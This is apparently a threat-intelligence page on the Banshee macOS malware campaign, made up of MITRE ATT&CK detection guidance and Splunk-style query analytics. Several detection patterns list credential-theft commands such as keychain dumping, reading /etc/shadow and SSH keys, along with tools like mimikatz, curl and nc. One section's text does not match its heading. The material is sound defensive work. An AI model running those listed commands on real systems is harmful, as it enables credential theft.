
Banshee Malware Campaign: Unmasking the Silent Threat to macOS
Indicators of Compromise
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1113 - Screen Capture
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation. | |||
Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk, such as CopyFromScreen, xwd, or screencapture.[1][2]. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment. |
T1033 - System Owner/User Discovery
ID | Data Source | Data Component | Detects |
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. [236] [237] [238] Note: Domain controllers may not log replication requests originating from the default domain controller account. [239]. Monitor for replication requests [240] from IPs not associated with known domain controllers. [241] | |||
Monitor executed commands and arguments that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Look for command-lines that invoke AuditD or the Security Accounts Manager (SAM). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, [242] which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on abuse of CMSTP. | |||
Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well. | |||
Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network protocols. | |||
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. | |||
Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. | |||
Monitor for unexpected processes interacting with lsass.exe.[243] Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity. Linux To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/<pid>/maps, where the <pid> directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs. | |||
Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic looks for any instances of at being created, therefore implying the querying or creation of tasks. If this tools is commonly used in your environment (e.g., by system administrators) this may lead to false positives and this analytic will therefore require tuning. Analytic 1 - Suspicious Process Execution (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND Image="*at.exe" | |||
Monitor for the SAM registry key being accessed that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
T1056.001 - Keylogging
ID | Data Source | Data Component | Detects |
Monitor for unusual kernel driver installation activity | |||
Monitor for API calls to the SetWindowsHook, GetKeyState, and GetAsyncKeyState.[2] and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes. | |||
Monitor for changes made to windows registry keys or values for unexpected modifications |
T1204.002 - Malicious File
ID | Data Source | Data Component | Detects |
Monitor for files created in unusual directories or files with suspicious extensions. Focus on common locations like the Downloads folder, Temp directories, or the user’s Desktop, especially files that would be of interest from spearphishing attachments. While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions. For MacOS, utilities that work in concert with Apple’s Endpoint Security Framework such as File Monitor can be used to track file creation events. Analytic 1 - Batch File Write to System32 (sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode="11") file_path="system32" AND file_extension=".bat" Analytic 2 - New file creation in unusual directories. sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=11| search file_path IN ("/Downloads/", "/Temp/", "/Desktop/")| stats count by file_name file_extension file_path user| where file_extension IN ("doc", "docx", "pdf", "xls", "rtf", "exe", "scr", "lnk", "pif", "cpl", "zip") | |||
Monitor for processes spawned after opening a suspicious file. Common applications that might be exploited are Microsoft Word, PDF readers, or compression utilities. Analytic 1 - Processes created from malicious files. (sourcetype=WinEventLog:Security EventCode=4688) OR (sourcetype=Sysmon EventCode=1)| search process_name IN ("WINWORD.EXE", "EXCEL.EXE", "PDFReader.exe", "7z.exe", "powershell.exe", "cmd.exe")| stats count by process_name parent_process_name command_line user| where parent_process_name IN ("explorer.exe", "outlook.exe", "thunderbird.exe") |
T1119 - Automated Collection
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that could be taken to collect internal data. | |||
Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data. | |||
Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. | |||
Monitor Azure AD (Entra ID) Sign In logs for suspicious Applications authenticating to the Graph API or other sensitive Resources using User Agents attributed to scripting interpreters such as python or Powershell. Analytic 1 - Suspicious applications, unusual user agents (e.g., python, PowerShell), anomalous IP addresses, and unmanaged devices index="azure_ad_signin_logs" Operation="UserLogin"| search UserAgent="python" OR UserAgent="PowerShell"| stats count by ClientIP, UserId, DeviceProperties| where ClientIP!="expected_ip" OR DeviceProperties!="expected_properties" |
T1115 - Clipboard Data
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications. | |||
Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications. |
T1082 - System Information Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. | |||
Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. | |||
Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. |
T1053 - Scheduled Task/Job
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Analytic 1 - Look for task scheduling commands being executed with unusual parameters. index=security (sourcetype="WinEventLog:Security" OR sourcetype="linux_secure" OR sourcetype="macos_secure" OR sourcetype="container_logs")| eval CommandLine = coalesce(CommandLine, process)| where (sourcetype="WinEventLog:Security" AND EventCode IN (4697, 4702, 4698)) OR (sourcetype="linux_secure" AND CommandLine LIKE "%cron%" OR CommandLine LIKE "%at%") OR (sourcetype="macos_secure" AND CommandLine LIKE "%launchctl%" OR CommandLine LIKE "%cron%") OR (sourcetype="container_logs" AND (CommandLine LIKE "%cron%" OR CommandLine LIKE "%at%"))| where (sourcetype="WinEventLog:Security" AND (CommandLine LIKE "%/create%" OR CommandLine LIKE "%/delete%" OR CommandLine LIKE "%/change%")) OR (sourcetype="linux_secure" AND (CommandLine LIKE "%-f%" OR CommandLine LIKE "%-m%" OR CommandLine LIKE "%--env%")) OR (sourcetype="macos_secure" AND (CommandLine LIKE "%/Library/LaunchDaemons%" OR CommandLine LIKE "%/Library/LaunchAgents%" OR CommandLine LIKE "%/System/Library/LaunchDaemons%" OR CommandLine LIKE "%/System/Library/LaunchAgents%")) OR (sourcetype="container_logs" AND (CommandLine LIKE "%-f%" OR CommandLine LIKE "%--schedule%" OR CommandLine LIKE "%--env%")) | |||
Monitor for newly constructed containers that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Analytic 1 - Look for new container creation events with unusual parameters. index=container_logs sourcetype="docker_events" OR sourcetype="kubernetes_events"| eval event_action=coalesce(action, status)| where (event_action="create" OR event_action="start")| search event_type="container"| search (parameters="--privileged" OR parameters="--cap-add=" OR parameters="--volume=" OR parameters="--network=host" OR parameters="--device") | |||
Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Analytic 1 - Look for new task files with unusual parameters. index=security_logs OR index=system_logs(sourcetype="docker_events" OR sourcetype="kubernetes_events" OR sourcetype="wineventlog:security" OR sourcetype="linux_secure" OR sourcetype="syslog" OR sourcetype="file_monitoring")| eval platform=case( sourcetype=="docker_events" OR sourcetype=="kubernetes_events", "Containers", sourcetype=="wineventlog:security", "Windows", sourcetype=="linux_secure" OR sourcetype=="syslog", "Linux", sourcetype=="mac_os_events", "macOS")| search ( (platform="Containers" AND (event_type="file_create" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/"))) OR (platform="Windows" AND EventCode=4663 AND (ObjectName="C:\Windows\System32\Tasks\" OR ObjectName="C:\Windows\Tasks\")) OR (platform="Linux" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/")) OR (platform="macOS" AND (file_path="/Library/LaunchDaemons/" OR file_path="/Library/LaunchAgents/"))) | |||
Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Analytic 1 - Look for task file modifications with unusual parameters. index=security_logs OR index=system_logs(sourcetype="docker_events" OR sourcetype="kubernetes_events" OR sourcetype="wineventlog:security" OR sourcetype="linux_secure" OR sourcetype="syslog" OR sourcetype="file_monitoring")| eval platform=case( sourcetype=="docker_events" OR sourcetype=="kubernetes_events", "Containers", sourcetype=="wineventlog:security", "Windows", sourcetype=="linux_secure" OR sourcetype=="syslog", "Linux", sourcetype=="mac_os_events", "macOS")| search ( (platform="Containers" AND (event_type="file_modify" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/" OR file_path="/etc/crontab"))) OR (platform="Windows" AND EventCode=4663 AND (ObjectName="C:\Windows\System32\Tasks\" OR ObjectName="C:\Windows\Tasks\")) OR (platform="Linux" AND (file_path="/etc/cron.d/" OR file_path="/etc/systemd/system/" OR file_path="/etc/crontab")) OR (platform="macOS" AND (file_path="/Library/LaunchDaemons/" OR file_path="/Library/LaunchAgents/"))) | |||
Monitor for newly executed processes that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Note: Below is the relevant Events and SourcesWindows:
Linux/macOS:
Containers:- Container logs: Detection of scheduled tasks or cron jobs within container environments. Analytic 1 - Look for task execution with unusual parameters. (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" OR sourcetype="WinEventLog:Security" OR sourcetype="linux_auditd" OR sourcetype="syslog") | where Image IN ("schtasks.exe", "at.exe", "Taskeng.exe", "cron", "crontab", "systemd-timers") | |||
Monitor newly constructed scheduled jobs that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Windows systems, security event ID 4698 (A scheduled task was created) provides information on newly created scheduled tasks. It includes the TaskContent field, which contains an XML blob that captures key information on the scheduled task including the command to be executed. Analytic 1 - Scheduled Task Execution source="*WinEventLog:Security" EventCode="4698" | where NOT (TaskName IN ("\Microsoft\Windows\UpdateOrchestrator\Reboot", "\Microsoft\Windows\Defrag\ScheduledDefrag"))| search TaskContent="powershell.exe" OR TaskContent="cmd.exe" |
T1059.002 - AppleScript
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Analytic 1 - Look for unusual execution of AppleScript. sourcetype=macOS:Process| search process_name="osascript"| eval suspicious_cmd=if(like(command_line, "%-e%") OR like(command_line, "%path/to/script%"), "Yes", "No")| where suspicious_cmd="Yes" | |||
Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Analytic 1 - Look for unusual OS API execution related to AppleScript. sourcetype=macOS:Syslog OR sourcetype=macOS:Process| search (process_name="NSAppleScript" OR process_name="OSAScript") | |||
Monitor for newly executed processes that may abuse AppleScript for execution. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Analytic 1 - Look for unusual AppleScript process creation. sourcetype=macOS:Process| search (parent_process_name="osascript" OR parent_process_name="NSAppleScript" OR parent_process_name="OSAScript") Analytic 2 - Untrusted Locations source="Osquery:" EventCode="process_added" AND Path LIKE "/Users//Downloads/" OR Path LIKE "/tmp/*" Analytic 3 - Parent/Child Process Relationship source="Osquery:" EventCode="process_added" AND ParentImage= "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder" AND Image LIKE "osascript" |
T1005 - Data from Local System
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. | |||
Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases. | |||
Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. | |||
Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. | |||
Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. |
T1555 - Credentials from Password Stores
ID | Data Source | Data Component | Detects |
Monitor for API calls and CLI commands that attempt to enumerate and fetch credential material from cloud secrets managers, such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure. Alert on any suspicious usages of these commands, such as an account or service generating an unusually high number of secret requests. Analytic 1 - High volume of secret requests from unusual accounts or services. index=security sourcetype IN ("aws:cloudtrail", "azure:activity", "gcp:activity")(eventName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys") ORoperationName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys") ORprotoPayload.methodName IN ("ListAccessKeys", "GetLoginProfile", "ListSecrets", "GetSecretValue", "GetParametersByPath", "ListKeys")) | |||
Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials. Analytic 1 - Commands indicating credential searches. (index=os sourcetype IN ("Powershell", "linux_secure", "macos_secure") CommandLine IN ("findstr /si password", "findstr /si pass", "grep -r password", "grep -r pass", "grep -r secret", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache", "cat /etc/shadow", "strings /etc/shadow", "ls -al ~/.ssh/known_hosts", "ssh-add -L")) | |||
Monitor for files being accessed that may search for common password storage locations to obtain user credentials. Analytic 1 - Unauthorized access to files containing credentials. index=security sourcetype IN ("WinEventLog:Security", "WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")((sourcetype="WinEventLog:Security" EventCode=4663 ObjectName IN ("passwords", "creds", "credentials", "secrets")) OR (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetObject IN ("passwords", "creds", "credentials", "secrets")) OR (sourcetype="linux_secure" action="open" filepath IN ("/etc/shadow", "/etc/passwd", "/.aws/credentials", "/.ssh/id_rsa")) OR (sourcetype="macos_secure" event_type="open" file_path IN ("/Library/Keychains/", "/Users//Library/Keychains/", "/Users//.ssh/id_rsa"))) | |||
Monitor for API calls that may search for common password storage locations to obtain user credentials. | |||
Monitor for processes being accessed that may search for common password storage locations to obtain user credentials. Analytic 1 - Unauthorized process access indicating credential searches. index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")(EventCode=10 TargetImage IN ("lsass.exe", "securityd", "ssh-agent", "gpg-agent") OR EventCode=11 TargetObject IN ("password", "creds", "credentials", "secrets", "keychain", ".kdbx", ".pfx", ".pem", ".p12", ".key") OR EventCode=1 CommandLine IN ("mimikatz", "procdump", "gcore", "dbxutil", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache")) | |||
Monitor newly executed processes that may search for common password storage locations to obtain user credentials. Analytic 1 - New processes with parameters indicating credential searches. index=security sourcetype IN ("WinEventLog:Microsoft-Windows-Sysmon/Operational", "linux_secure", "macos_secure")(EventCode=1 CommandLine IN ("mimikatz", "procdump", "gcore", "dbxutil", "security find-generic-password", "security find-internet-password", "security dump-keychain", "gsettings get org.gnome.crypto.cache", "cat /etc/shadow", "strings /etc/shadow", "ls -al ~/.ssh/known_hosts", "ssh-add -L")) |
T1016 - System Network Configuration Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. | |||
Monitor for API calls (such as GetAdaptersInfo() and GetIpNetTable()) that may gather details about the network configuration and settings, such as IP and/or MAC addresses. | |||
Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses. Note: The Analytic looks for the creation of ipconfig, route, and nbtstat processes, all of which are system administration utilities that can be used for the purpose of system network configuration discovery. If these tools are commonly used in your environment (e.g., by system administrators) this may lead to false positives and this analytic will therefore require tuning. Analytic 1 - Suspicious Process (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND (Image="C:\Windows\System32\ipconfig.exe" OR Image="C:\Windows\System32\route.exe" OR Image="C:\Windows\System32\nbtstat.exe") | |||
Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. |
T1087 - Account Discovery
ID | Data Source | Data Component | Detects |
Monitor logs and other sources of command execution history for actions that could be taken to gather information about accounts, including the use of calls to cloud APIs that perform account discovery. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. | |||
Monitor access to file resources that contain local accounts and groups information such as /etc/passwd, /Users directories, and the SAM database. If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources. | |||
Monitor for processes that can be used to enumerate user accounts and groups such as net.exe and net1.exe, especially when executed in quick succession.[10] Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. |
T1083 - File and Directory Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users. | |||
Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. | |||
Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. |
T1057 - Process Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that may attempt to get information about running processes on a system. | |||
Monitor for API calls may attempt to get information about running processes on a system. | |||
Monitor for newly executed processes that may attempt to get information about running processes on a system. To be effective in deciphering malicious and benign activity, the full command line is essential. Similarly, having information about the parent process can help with making decisions and tuning to an environment. Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.Within the built-in Windows Commands:
Analytic 1 - Host Discovery Commands (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") (Image="C:\Windows\\hostname.exe" OR Image="C:\Windows\\ipconfig.exe" OR Image="C:\Windows\\net.exe" OR Image="C:\Windows\\quser.exe" OR Image="C:\Windows\\qwinsta.exe" OR (Image="C:\Windows\\sc.exe" AND (CommandLine=" query " OR CommandLine=" qc ")) OR Image="C:\Windows\\systeminfo.exe" OR Image="C:\Windows\\tasklist.exe" OR Image="C:\Windows\*\whoami.exe")|stats values(Image) as "Images" values(CommandLine) as "Command Lines" by ComputerName |
T1547.001 - Registry Run Keys / Startup Folder
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. | |||
Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. [302] | |||
Monitor for newly executed processes executed from the Run/RunOnce registry keys through Windows EID 9707 or "Software\Microsoft\Windows\CurrentVersion\Run" and "Software\Microsoft\Windows\CurrentVersion\RunOnce" registry keys with the full command line. Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly. Output DescriptionThe sequence of processes that resulted in reg.exe being started from a shell. That is, a hierarchy that looks like• great-grand_parent.exe• grand_parent.exe• parent.exe• reg.exe Analytic 1 - Reg.exe called from Command Shell (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") Image="reg.exe" AND ParentImage="cmd.exe"| join left=L right=R where L.ParentProcessGuid = R.ProcessGuid [search EventCode IN (1, 4688) Image="cmd.exe" ParentImage!="explorer.exe"] | |||
Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. | |||
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations. [302] Detection of the modification of the registry key Common Startup located in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\ and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys. Analytic 1 - Modification of Default Startup Folder in the Registry Key ‘Common Startup’ (source="WinEventLog:Security" EventCode="4657" ObjectValueName="Common Startup") OR (source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" TargetObject="*Common Startup") |
T1059.004 - Unix Shell
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may abuse Unix shell commands and scripts for execution. Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Note: this analytic does not include an exhaustive list of potentially suspicious commands that could be executed through a shell interpreter. Instead, it is meant to serve as an example of types of commands that can warrant further investigation. Analytic 1 - Unusual command execution sourcetype="linux_logs" CommandLine="sh -c" AND (CommandLine="wget" OR CommandLine="curl" OR CommandLine="nc" OR CommandLine="perl") | |||
Monitor for newly executed processes that may abuse Unix shell commands and scripts for execution. Analytic 1 - Look for unusual Unix shell process creation. sourcetype=linux_secure OR sourcetype=macos_secure| search (command="sh" OR command="bash" OR command="zsh")| eval suspicious_process=if(like(command_line, "%.sh" OR "%.bash" OR "%.zsh"), "Yes", "No")| where suspicious_process="Yes" |
T1012 - Query Registry
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software. Note: For PowerShell Module logging event id 4103, enable logging for module Microsoft.PowerShell.Management. The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such a registry key (PSProvider "Registry"). The the Get-ChildItem gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations. Analytic 1 - Suspicious Commands (sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational" EventCode="4103") | WHERE CommandLine LIKE "%New-PSDrive%" AND (CommandLine LIKE "%Registry%" OR CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine LIKE "%HKCR%") | |||
Monitor for API calls (such as RegOpenKeyExA) that may interact with the Windows Registry to gather information about the system, configuration, and installed software. OS API calls associated with querying the Windows Registry are RegOpenKeyEx , RegOpenUserClassesRoot, RegQueryValueExA, and RegQueryValueExW. Execution of these functions might trigger security log ids such as 4663 (Microsoft Security Auditing). Also monitor for RegOpenUserClassesRoot api to retrieve a handle to the HKEY_CLASSES_ROOT key for a specified user. The returned key has a view of the registry that merges the contents of the HKEY_LOCAL_MACHINE\Software\Classes key with the contents of the Software\Classes keys in the user's registry hive. Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. | |||
Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software. Note: The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such a registry key (PSProvider "Registry"). The Get-ChildItem gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations. Note for Analytic 3: Replace FilePathToLolbasProcessXX.exe with lolBAS process names that are used by your organization. The number_standard_deviations parameter should be tuned accordingly. Identifying outliers by comparing distance from a data point to the average value against a certain number of standard deviations is recommended for data values that are symmetrical distributed. If your data is not distributed, try a different algorithm such as the Interquartile Range (IQR). Analytic 1 - Suspicious Processes with Registry keys (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") | search (CommandLine LIKE "%reg%" AND CommandLine LIKE "%query%") OR (CommandLine LIKE "%Registry%" AND (CommandLine LIKE "%HKEY_CLASSES_ROOT%" OR CommandLine "%HKCR%")) Analytic 2 - reg.exe spawned from suspicious cmd.exe ((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") | WHERE (Image LIKE "%reg.exe%" AND ParentImage LIKE "%cmd.exe%")| rename ProcessParentGuid as guid| join type=inner guid[ | search ((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688") AND (Image LIKE "%cmd.exe%" AND ParentImage NOT LIKE "%explorer.exe%")| rename ProcessGuid as guid ] Analytic 3 - Rare LolBAS command lines ((sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (sourcetype="WinEventLog:Security" EventCode="4688") AND Image IN ('FilePathToLolbasProcess01.exe','FilePathToLolbasProcess02.exe') AND number_standard_deviations = 1.5| select Image, ProcessCount, AVG(ProcessCount) Over() - STDEV(ProcessCount) Over() * number_standard_deviations AS LowerBound | WHERE ProcessCount < LowerBound | |||
Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information. Note: For Security Auditing event ids 4656 and 4663, a System Access Control List (SACL) that controls the use of specific access rights such as Enumerate sub-keys and Query key value is required for event generation. Depending on the Registry key you are monitoring, the implementation of a new System Access Control List (SACL) might be required. Depending of Registry key used for the creation of a System Access Control List (SACL), the generation of event ids 4656 and 4663 might be noisy. Analytic 1 - Suspicious Registry (sourcetype="WinEventLog:Security" EventCode IN (4663, 4656)) AND ObjectType="Key" | WHERE ObjectName LIKE "%SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall%" AND (UserAccessList LIKE "%4435%" OR UserAccessList LIKE "%Enumerate sub-keys%" OR UserAccessList LIKE "%4432%" OR UserAccessList LIKE "%Query key value%") AND Image NOT IN ('FilePathToExpectedProcess01.exe','FilePathToExpectedProcess02.exe') |
T1543.001 - Launch Agent
ID | Data Source | Data Component | Detects |
Ensure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. | |||
Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. | |||
Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications. | |||
Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. | |||
Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence. |
T1070.004 - File Deletion
